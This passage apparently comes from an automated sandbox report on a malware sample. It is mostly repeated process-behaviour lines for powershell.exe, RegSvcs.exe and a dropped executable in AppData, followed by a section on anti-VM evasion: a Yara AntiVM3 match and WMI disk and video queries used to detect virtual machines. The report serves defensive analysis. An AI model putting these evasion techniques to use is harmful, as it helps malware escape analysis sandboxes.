                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: 13P2mxLaQk.exe PID: 5880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VWGccZGgix.exe PID: 5292, type: MEMORYSTR
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
